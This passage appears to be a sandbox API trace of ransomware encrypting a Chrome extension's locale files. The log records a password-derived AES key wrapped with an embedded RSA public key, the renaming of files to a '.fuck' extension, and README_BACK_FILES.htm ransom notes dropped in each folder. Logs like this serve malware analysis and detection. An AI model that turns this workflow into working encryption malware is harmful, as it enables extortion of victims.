lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0255.328] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0255.329] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.gsg")) returned 1 [0255.330] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.fuck")) returned 1 [0255.331] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.331] CryptDestroyKey (hKey=0x2e180e8) returned 1 [0255.331] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.331] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.331] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.331] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0255.332] AreFileApisANSI () returned 1 [0255.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.332] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.332] GetFileType (hFile=0x5d50) returned 0x1 [0255.332] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.335] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.335] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.337] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.337] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.337] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.337] GetLastError () returned 0x0 [0255.337] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json")) returned 0x20 [0255.337] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json", dwFileAttributes=0x80) returned 1 [0255.338] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.339] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.339] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.340] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.342] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.342] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.342] CryptHashData (hHash=0x2e18828, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.342] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.342] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.342] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.342] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12008) returned 1 [0255.343] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12008, dwCertEncodingType=0x1, pInfo=0x29903b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29903e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29903e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e188a8) returned 1 [0255.343] CryptEncrypt (in: hKey=0x2e188a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.343] CryptEncrypt (in: hKey=0x2e188a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11810*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11810*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.343] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e11810*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11810*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.344] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x20b, lpOverlapped=0x0) returned 1 [0255.345] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x20b, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x210) returned 1 [0255.345] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x210, lpOverlapped=0x0) returned 1 [0255.372] CloseHandle (hObject=0x5d60) returned 1 [0255.372] CloseHandle (hObject=0x5d5c) returned 1 [0255.372] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), bFailIfExists=0) returned 1 [0255.378] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json", dwFileAttributes=0x0) returned 1 [0255.379] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.gsg")) returned 1 [0255.383] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.fuck")) returned 1 [0255.384] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.384] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.384] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.384] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.384] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.385] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\readme_back_files.htm")) returned 0xffffffff [0255.385] AreFileApisANSI () returned 1 [0255.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.385] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.386] GetFileType (hFile=0x5d50) returned 0x1 [0255.386] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.388] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.388] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.388] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.388] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.388] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.388] GetLastError () returned 0x0 [0255.388] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json")) returned 0x20 [0255.389] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0255.389] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.390] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.391] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.391] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.394] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.394] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.394] CryptHashData (hHash=0x2e180e8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.394] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.394] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.395] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.395] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12090) returned 1 [0255.395] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12090, dwCertEncodingType=0x1, pInfo=0x2990550*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990580*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990588*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18e28) returned 1 [0255.395] CryptEncrypt (in: hKey=0x2e18e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.395] CryptEncrypt (in: hKey=0x2e18e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11678*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11678*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.396] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11678*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11678*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.397] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb1, lpOverlapped=0x0) returned 1 [0255.398] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.398] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.398] CloseHandle (hObject=0x5d5c) returned 1 [0255.398] CloseHandle (hObject=0x5d60) returned 1 [0255.399] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0255.403] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0255.404] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0255.405] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0255.407] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0255.407] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.407] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.407] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.407] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.407] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0255.407] AreFileApisANSI () returned 1 [0255.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.407] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.408] GetFileType 